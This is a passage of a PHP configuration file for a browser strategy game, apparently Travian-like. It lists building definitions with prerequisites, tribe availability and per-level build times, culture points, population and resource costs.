array ('time_consume' => 103680, 'resources' => array( '1' => 9290, '2' => 13145, '3' => 6055, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9820, '2' => 13890, '3' => 6400, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10340, '2' => 14625, '3' => 6740, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10850, '2' => 15355, '3' => 7075, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11360, '2' => 16070, '3' => 7405, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11860, '2' => 16780, '3' => 7730, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12360, '2' => 17485, '3' => 8055, '4' => 1445)),



'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 3, '22' => 1 ),

'levels'=> array(


'value' => 102, 'time_consume' => 2000, 'cp' => 2, 'people_inc' => 4,

'resources' => array( '1' => 260, '2' => 420, '3' => 820, '4' => 260 )



'value' => 104, 'time_consume' => 2620, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 330, '2' => 540, '3' => 1050, '4' => 330 )



'value' => 106, 'time_consume' => 3340, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 430, '2' => 690, '3' => 1340, '4' => 430 )



'value' => 108, 'time_consume' => 4170, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 550, '2' => 880, '3' => 1720, '4' => 550 )



'value' => 110, 'time_consume' => 5140, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 700, '2' => 1130, '3' => 2200, '4' => 700 )



'value' => 112, 'time_consume' => 6260, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 890, '2' => 1440, '3' => 2820, '4' => 890 )



'value' => 114, 'time_consume' => 7570, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 1140, '2' => 1850, '3' => 3610, '4' => 1140 )



'value' => 116, 'time_consume' => 9080, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 1460, '2' => 2360, '3' => 4620, '4' => 1460 )



'value' => 118, 'time_consume' => 10830, 'cp' => 10, 'people_inc' => 3,

'resources' => array( '1' => 1870, '2' => 3030, '3' => 5910, '4' => 1870 )



'value' => 120, 'time_consume' => 12860, 'cp' => 12, 'people_inc' => 3,

'resources' => array( '1' => 2400, '2' => 3870, '3' => 7560, '4' => 2400 )



'value' => 122, 'time_consume' => 15220, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 3070, '2' => 4960, '3' => 9680, '4' => 3070 )



'value' => 124, 'time_consume' => 17950, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 3930, '2' => 6350, '3' => 12390, '4' => 3930 )



'value' => 126, 'time_consume' => 21130, 'cp' => 21, 'people_inc' => 3,

'resources' => array( '1' => 5030, '2' => 8120, '3' => 15860, '4' => 5030 )



'value' => 128, 'time_consume' => 24810, 'cp' => 26, 'people_inc' => 3,

'resources' => array( '1' => 6440, '2' => 10400, '3' => 20300, '4' => 6440 )



'value' => 130, 'time_consume' => 29080, 'cp' => 31, 'people_inc' => 3,

'resources' => array( '1' => 8240, '2' => 13310, '3' => 25990, '4' => 8240 )



'value' => 132, 'time_consume' => 34030, 'cp' => 37, 'people_inc' => 4,

'resources' => array( '1' => 10550, '2' => 17040, '3' => 33260, '4' => 10550 )



'value' => 134, 'time_consume' => 39770, 'cp' => 44, 'people_inc' => 4,

'resources' => array( '1' => 13500, '2' => 21810, '3' => 42580, '4' => 13500 )



'value' => 136, 'time_consume' => 46440, 'cp' => 53, 'people_inc' => 4,

'resources' => array( '1' => 17280, '2' => 27910, '3' => 54500, '4' => 17280 )



'value' => 138, 'time_consume' => 54170, 'cp' => 64, 'people_inc' => 4,

'resources' => array( '1' => 22120, '2' => 35730, '3' => 69760, '4' => 22120 )



'value' => 140, 'time_consume' => 63130, 'cp' => 77, 'people_inc' => 4,

'resources' => array( '1' => 28310, '2' => 45730, '3' => 89290, '4' => 28310 )




'14'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '16' => 15 ),

'levels'=> array(


'value' => 110, 'time_consume' => 3500, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 1750, '2' => 2250, '3' => 1530, '4' => 240 )



'value' => 120, 'time_consume' => 4360, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 2240, '2' => 2880, '3' => 1960, '4' => 305 )



'value' => 130, 'time_consume' => 5360, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 2865, '2' => 3685, '3' => 2505, '4' => 395 )



'value' => 140, 'time_consume' => 6510, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 3670, '2' => 4720, '3' => 3210, '4' => 505 )



'value' => 150, 'time_consume' => 7860, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 4700, '2' => 6040, '3' => 4105, '4' => 645 )



'value' => 160, 'time_consume' => 9410, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 6015, '2' => 7730, '3' => 5255, '4' => 825 )



'value' => 170, 'time_consume' => 11220, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 7695, '2' => 9895, '3' => 6730, '4' => 1055 )



'value' => 180, 'time_consume' => 13320, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 9850, '2' => 12665, '3' => 8615, '4' => 1350 )



'value' => 190, 'time_consume' => 15750, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 12610, '2' => 16215, '3' => 11025, '4' => 1730 )



'value' => 200, 'time_consume' => 18570, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 16140, '2' => 20755, '3' => 14110, '4' => 2215 )



'value' => 210, 'time_consume' => 21840, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 20660, '2' => 26565, '3' => 18065, '4' => 2835 )



'value' => 220, 'time_consume' => 25630, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 26445, '2' => 34000, '3' => 23120, '4' => 3625 )



'value' => 230, 'time_consume' => 30030, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 33850, '2' => 43520, '3' => 29595, '4' => 4640 )



'value' => 240, 'time_consume' => 35140, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 43330, '2' => 55705, '3' => 37880, '4' => 5940 )



'value' => 250, 'time_consume' => 41060, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 55460, '2' => 71305, '3' => 48490, '4' => 7605 )



'value' => 260, 'time_consume' => 47930, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 70990, '2' => 91270, '3' => 62065, '4' => 9735 )



'value' => 270, 'time_consume' => 55900, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 90865, '2' => 116825, '3' => 79440, '4' => 12460 )



'value' => 280, 'time_consume' => 65140, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 116305, '2' => 149540, '3' => 101685, '4' => 15950 )



'value' => 290, 'time_consume' => 75860, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 148875, '2' => 191410, '3' => 130160, '4' => 20415 )



'value' => 300, 'time_consume' => 88300, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 190560, '2' => 245005, '3' => 166600, '4' => 26135 )




'15'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 100, 'time_consume' => 4000, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 70, '2' => 40, '3' => 60, '4' => 20 )



'value' => 96, 'time_consume' => 2620, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 90, '2' => 50, '3' => 75, '4' => 25 )



'value' => 93, 'time_consume' => 3354, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 115, '2' => 65, '3' => 100, '4' => 35 )



'value' => 90, 'time_consume' => 4172, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 145, '2' => 85, '3' => 125, '4' => 40 )



'value' => 86, 'time_consume' => 5122, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 190, '2' => 105, '3' => 160, '4' => 55 )



'value' => 83, 'time_consume' => 6290, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 240, '2' => 135, '3' => 205, '4' => 70 )



'value' => 80, 'time_consume' => 7590, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 310, '2' => 175, '3' => 265, '4' => 90 )



'value' => 77, 'time_consume' => 9100, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 395, '2' => 225, '3' => 340, '4' => 115 )



'value' => 75, 'time_consume' => 10883, 'cp' => 10, 'people_inc' => 2,

'resources' => array( '1' => 505, '2' => 290, '3' => 430, '4' => 145 )



'value' => 72, 'time_consume' => 12786, 'cp' => 12, 'people_inc' => 2,

'resources' => array( '1' => 645, '2' => 370, '3' => 555, '4' => 185 )



'value' => 69, 'time_consume' => 15194, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 825, '2' => 470, '3' => 710, '4' => 235 )



'value' => 67, 'time_consume' => 18028, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 1060, '2' => 605, '3' => 905, '4' => 300 )



'value' => 64, 'time_consume' => 21074, 'cp' => 21, 'people_inc' => 2,

'resources' => array( '1' => 1355, '2' => 775, '3' => 1160, '4' => 385 )



'value' => 62, 'time_consume' => 24968, 'cp' => 26, 'people_inc' => 2,

'resources' => array( '1' => 1735, '2' => 990, '3' => 1485, '4' => 495 )



'value' => 60, 'time_consume' => 29112, 'cp' => 31, 'people_inc' => 2,

'resources' => array( '1' => 2220, '2' => 1270, '3' => 1900, '4' => 635 )



'value' => 58, 'time_consume' => 33950, 'cp' => 37, 'people_inc' => 3,

'resources' => array( '1' => 2840, '2' => 1625, '3' => 2435, '4' => 810 )



'value' => 56, 'time_consume' => 39568, 'cp' => 44, 'people_inc' => 3,

'resources' => array( '1' => 3635, '2' => 2075, '3' => 3115, '4' => 1040 )



'value' => 54, 'time_consume' => 46125, 'cp' => 53, 'people_inc' => 3,

'resources' => array( '1' => 4650, '2' => 2660, '3' => 3990, '4' => 1330 )



'value' => 52, 'time_consume' => 53777, 'cp' => 64, 'people_inc' => 3,

'resources' => array( '1' => 5955, '2' => 3405, '3' => 5105, '4' => 1700 )



'value' => 50, 'time_consume' => 62750, 'cp' => 77, 'people_inc' => 3,

'resources' => array( '1' => 7620, '2' => 4355, '3' => 6535, '4' => 2180 )




'16'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 0, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 110, '2' => 160, '3' => 90, '4' => 70 )



'value' => 0, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 140, '2' => 205, '3' => 115, '4' => 90 )



'value' => 0, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 180, '2' => 260, '3' => 145, '4' => 115 )



'value' => 0, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 230, '2' => 335, '3' => 190, '4' => 145 )



'value' => 0, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 295, '2' => 430, '3' => 240, '4' => 190 )



'value' => 0, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 380, '2' => 550, '3' => 310, '4' => 240 )



'value' => 0, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 485, '2' => 705, '3' => 395, '4' => 310 )



'value' => 0, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 620, '2' => 900, '3' => 505, '4' => 395 )



'value' => 0, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 795, '2' => 1155, '3' => 650, '4' => 505 )



'value' => 0, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 1015, '2' => 1475, '3' => 830, '4' => 645 )



'value' => 0, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 1300, '2' => 1890, '3' => 1065, '4' => 825 )



'value' => 0, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 1660, '2' => 2420, '3' => 1360, '4' => 1060 )



'value' => 0, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 2130, '2' => 3095, '3' => 1740, '4' => 1355 )



'value' => 0, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 2725, '2' => 3960, '3' => 2230, '4' => 1735 )



'value' => 0, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 3485, '2' => 5070, '3' => 2850, '4' => 2220 )



'value' => 0, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 4460, '2' => 6490, '3' => 3650, '4' => 2840 )



'value' => 0, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 5710, '2' => 8310, '3' => 4675, '4' => 3635 )



'value' => 0, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 7310, '2' => 10635, '3' => 5980, '4' => 4650 )



'value' => 0, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 9360, '2' => 13610, '3' => 7655, '4' => 5955 )



'value' => 0, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 11980, '2' => 17420, '3' => 9800, '4' => 7620 )




'17'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 3, '10' => 1, '11' => 1 ),

'levels'=> array(


'value' => 1, 'time_consume' => 1800, 'cp' => 4, 'people_inc' => 4,

'resources' => array( '1' => 80, '2' => 70, '3' => 120, '4' => 70 )



'value' => 2, 'time_consume' => 2390, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 100, '2' => 90, '3' => 155, '4' => 90 )



'value' => 3, 'time_consume' => 3070, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 130, '2' => 115, '3' => 195, '4' => 115 )



'value' => 4, 'time_consume' => 3860, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 170, '2' => 145, '3' => 250, '4' => 145 )



'value' => 5, 'time_consume' => 4780, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 215, '2' => 190, '3' => 320, '4' => 190 )



'value' => 6, 'time_consume' => 5840, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 275, '2' => 240, '3' => 410, '4' => 240 )



'value' => 7, 'time_consume' => 7080, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 350, '2' => 310, '3' => 530, '4' => 310 )



'value' => 8, 'time_consume' => 8510, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 450, '2' => 395, '3' => 675, '4' => 395 )



'value' => 9, 'time_consume' => 10170, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 575, '2' => 505, '3' => 865, '4' => 505 )



'value' => 10, 'time_consume' => 12100, 'cp' => 19, 'people_inc' => 3,

'resources' => array( '1' => 740, '2' => 645, '3' => 1105, '4' => 645 )



'value' => 11, 'time_consume' => 14340, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 945, '2' => 825, '3' => 1415, '4' => 825 )



'value' => 12, 'time_consume' => 16930, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 1210, '2' => 1060, '3' => 1815, '4' => 1060 )



'value' => 13, 'time_consume' => 19940, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 1545, '2' => 1355, '3' => 2320, '4' => 1355 )



'value' => 14, 'time_consume' => 23430, 'cp' => 39, 'people_inc' => 3,

'resources' => array( '1' => 1980, '2' => 1735, '3' => 2970, '4' => 1735 )



'value' => 15, 'time_consume' => 27480, 'cp' => 46, 'people_inc' => 3,

'resources' => array( '1' => 2535, '2' => 2220, '3' => 3805, '4' => 2220 )



'value' => 16, 'time_consume' => 32180, 'cp' => 55, 'people_inc' => 4,

'resources' => array( '1' => 3245, '2' => 2840, '3' => 4870, '4' => 2840 )



'value' => 17, 'time_consume' => 37620, 'cp' => 67, 'people_inc' => 4,

'resources' => array( '1' => 4155, '2' => 3635, '3' => 6230, '4' => 3635 )



'value' => 18, 'time_consume' => 43940, 'cp' => 80, 'people_inc' => 4,

'resources' => array( '1' => 5315, '2' => 4650, '3' => 7975, '4' => 4650 )



'value' => 19, 'time_consume' => 51270, 'cp' => 96, 'people_inc' => 4,

'resources' => array( '1' => 6805, '2' => 5955, '3' => 10210, '4' => 5955 )



'value' => 20, 'time_consume' => 59780, 'cp' => 115, 'people_inc' => 4,

'resources' => array( '1' => 8710, '2' => 7620, '3' => 13065, '4' => 7620 )




'18'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 1 ),

'levels'=> array(


'value' => 0, 'time_consume' => 2000, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 180, '2' => 130, '3' => 150, '4' => 80 )



'value' => 0, 'time_consume' => 2620, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 230, '2' => 165, '3' => 190, '4' => 100 )



'value' => 9, 'time_consume' => 3340, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 295, '2' => 215, '3' => 245, '4' => 130 )



'value' => 12, 'time_consume' => 4170, 'cp' => 8, 'people_inc' => 2,

'resources' => array( '1' => 375, '2' => 275, '3' => 315, '4' => 170 )



'value' => 15, 'time_consume' => 5140, 'cp' => 10, 'people_inc' => 2,

'resources' => array( '1' => 485, '2' => 350, '3' => 405, '4' => 215 )



'value' => 18, 'time_consume' => 6260, 'cp' => 12, 'people_inc' => 2,

'resources' => array( '1' => 620, '2' => 445, '3' => 515, '4' => 275 )



'value' => 21, 'time_consume' => 7570, 'cp' => 14, 'people_inc' => 2,

'resources' => array( '1' => 790, '2' => 570, '3' => 660, '4' => 350 )



'value' => 24, 'time_consume' => 9080, 'cp' => 17, 'people_inc' => 2,

'resources' => array( '1' => 1015, '2' => 730, '3' => 845, '4' => 450 )



'value' => 27, 'time_consume' => 10830, 'cp' => 21, 'people_inc' => 2,

'resources' => array( '1' => 1295, '2' => 935, '3' => 1080, '4' => 575 )



'value' => 30, 'time_consume' => 12860, 'cp' => 25, 'people_inc' => 2,

'resources' => array( '1' => 1660, '2' => 1200, '3' => 1385, '4' => 740 )



'value' => 33, 'time_consume' => 15220, 'cp' => 30, 'people_inc' => 3,

'resources' => array( '1' => 2125, '2' => 1535, '3' => 1770, '4' => 945 )



'value' => 36, 'time_consume' => 17950, 'cp' => 36, 'people_inc' => 3,

'resources' => array( '1' => 2720, '2' => 1965, '3' => 2265, '4' => 1210 )



'value' => 39, 'time_consume' => 21130, 'cp' => 43, 'people_inc' => 3,

'resources' => array( '1' => 3480, '2' => 2515, '3' => 2900, '4' => 1545 )



'value' => 42, 'time_consume' => 24810, 'cp' => 51, 'people_inc' => 3,

'resources' => array( '1' => 4455, '2' => 3220, '3' => 3715, '4' => 1980 )



'value' => 45, 'time_consume' => 29080, 'cp' => 62, 'people_inc' => 3,

'resources' => array( '1' => 5705, '2' => 4120, '3' => 4755, '4' => 2535 )



'value' => 48, 'time_consume' => 34030, 'cp' => 74, 'people_inc' => 3,

'resources' => array( '1' => 7300, '2' => 5275, '3' => 6085, '4' => 3245 )



'value' => 51, 'time_consume' => 39770, 'cp' => 89, 'people_inc' => 3,

'resources' => array( '1' => 9345, '2' => 6750, '3' => 7790, '4' => 4155 )



'value' => 54, 'time_consume' => 46440, 'cp' => 106, 'people_inc' => 3,

'resources' => array( '1' => 11965, '2' => 8640, '3' => 9970, '4' => 5315 )



'value' => 57, 'time_consume' => 54170, 'cp' => 127, 'people_inc' => 3,

'resources' => array( '1' => 15315, '2' => 11060, '3' => 12760, '4' => 6805 )



'value' => 60, 'time_consume' => 63130, 'cp' => 127, 'people_inc' => 3,

'resources' => array( '1' => 19600, '2' => 14155, '3' => 16335, '4' => 8710 )




'19'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '16' => 1, '15' => 3 ),

'levels'=> array(


'value' => 100, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 4,

'resources' => array( '1' => 210, '2' => 140, '3' => 260, '4' => 120 )



'value' => 90, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 270, '2' => 180, '3' => 335, '4' => 155 )



'value' => 81, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 345, '2' => 230, '3' => 425, '4' => 195 )



'value' => 73, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 440, '2' => 295, '3' => 545, '4' => 250 )



'value' => 66, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 565, '2' => 375, '3' => 700, '4' => 320 )



'value' => 59, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 720, '2' => 480, '3' => 895, '4' => 410 )



'value' => 53, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 925, '2' => 615, '3' => 1145, '4' => 530 )



'value' => 48, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 1180, '2' => 790, '3' => 1465, '4' => 675 )



'value' => 43, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 1515, '2' => 1010, '3' => 1875, '4' => 865 )



'value' => 39, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 1935, '2' => 1290, '3' => 2400, '4' => 1105 )



'value' => 35, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 2480, '2' => 1655, '3' => 3070, '4' => 1415 )



'value' => 31, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 3175, '2' => 2115, '3' => 3930, '4' => 1815 )



'value' => 28, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 4060, '2' => 2710, '3' => 5030, '4' => 2320 )



'value' => 25, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 5200, '2' => 3465, '3' => 6435, '4' => 2970 )



'value' => 23, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 6655, '2' => 4435, '3' => 8240, '4' => 3805 )



'value' => 21, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 4,

'resources' => array( '1' => 8520, '2' => 5680, '3' => 10545, '4' => 4870 )



'value' => 19, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 4,

'resources' => array( '1' => 10905, '2' => 7270, '3' => 13500, '4' => 6230 )



'value' => 17, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 4,

'resources' => array( '1' => 13955, '2' => 9305, '3' => 17280, '4' => 7975 )



'value' => 15, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 4,

'resources' => array( '1' => 17865, '2' => 11910, '3' => 22120, '4' => 10210 )



'value' => 14, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 4,

'resources' => array( '1' => 22865, '2' => 15245, '3' => 28310, '4' => 13065 )




'20'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '12' => 3, '22' => 5 ),

'levels'=> array(


'value' => 100, 'time_consume' => 2200, 'cp' => 2, 'people_inc' => 5,

'resources' => array( '1' => 260, '2' => 140, '3' => 220, '4' => 100 )



'value' => 90, 'time_consume' => 2850, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 335, '2' => 180, '3' => 280, '4' => 130 )



'value' => 81, 'time_consume' => 3610, 'cp' => 3, 'people_inc' => 3,

'resources' => array( '1' => 425, '2' => 230, '3' => 360, '4' => 165 )



'value' => 73, 'time_consume' => 4490, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 545, '2' => 295, '3' => 460, '4' => 210 )



'value' => 66, 'time_consume' => 5500, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 700, '2' => 375, '3' => 590, '4' => 270 )



'value' => 59, 'time_consume' => 6680, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' => 895, '2' => 480, '3' => 755, '4' => 345 )



'value' => 53, 'time_consume' => 8050, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 1145, '2' => 615, '3' => 970, '4' => 440 )



'value' => 48, 'time_consume' => 9640, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 1465, '2' => 790, '3' => 1240, '4' => 565 )



'value' => 43, 'time_consume' => 11480, 'cp' => 10, 'people_inc' => 3,

'resources' => array( '1' => 1875, '2' => 1010, '3' => 1585, '4' => 720 )



'value' => 39, 'time_consume' => 13620, 'cp' => 12, 'people_inc' => 3,

'resources' => array( '1' => 2400, '2' => 1290, '3' => 2030, '4' => 920 )



'value' => 35, 'time_consume' => 16100, 'cp' => 15, 'people_inc' => 4,

'resources' => array( '1' => 3070, '2' => 1655, '3' => 2595, '4' => 1180 )



'value' => 31, 'time_consume' => 18980, 'cp' => 18, 'people_inc' => 4,

'resources' => array( '1' => 3930, '2' => 2115, '3' => 3325, '4' => 1510 )



'value' => 28, 'time_consume' => 22310, 'cp' => 21, 'people_inc' => 4,

'resources' => array( '1' => 5030, '2' => 2710, '3' => 4255, '4' => 1935 )



'value' => 25, 'time_consume' => 26180, 'cp' => 26, 'people_inc' => 4,

'resources' => array( '1' => 6435, '2' => 3465, '3' => 5445, '4' => 2475 )



'value' => 23, 'time_consume' => 30670, 'cp' => 31, 'people_inc' => 4,

'resources' => array( '1' => 8240, '2' => 4435, '3' => 6970, '4' => 3170 )



'value' => 21, 'time_consume' => 35880, 'cp' => 37, 'people_inc' => 4,

'resources' => array( '1' => 10545, '2' => 5680, '3' => 8925, '4' => 4055 )



'value' => 19, 'time_consume' => 41920, 'cp' => 44, 'people_inc' => 4,

'resources' => array( '1' => 13500, '2' => 7270, '3' => 11425, '4' => 5190 )



'value' => 17, 'time_consume' => 48930, 'cp' => 53, 'people_inc' => 4,

'resources' => array( '1' => 17280, '2' => 9305, '3' => 14620, '4' => 6645 )



'value' => 15, 'time_consume' => 57060, 'cp' => 64, 'people_inc' => 4,

'resources' => array( '1' => 22120, '2' => 11910, '3' => 18715, '4' => 8505 )



'value' => 14, 'time_consume' => 66490, 'cp' => 77, 'people_inc' => 4,

'resources' => array( '1' => 28310, '2' => 15245, '3' => 23955, '4' => 10890 )




'21'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '22' => 10, '15' => 5 ),

'levels'=> array(


'value' => 100, 'time_consume' => 3000, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 460, '2' => 510, '3' => 600, '4' => 320 )



'value' => 90, 'time_consume' => 3780, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 590, '2' => 655, '3' => 770, '4' => 410 )



'value' => 81, 'time_consume' => 4680, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 755, '2' => 835, '3' => 985, '4' => 525 )



'value' => 73, 'time_consume' => 5730, 'cp' => 6, 'people_inc' => 2,

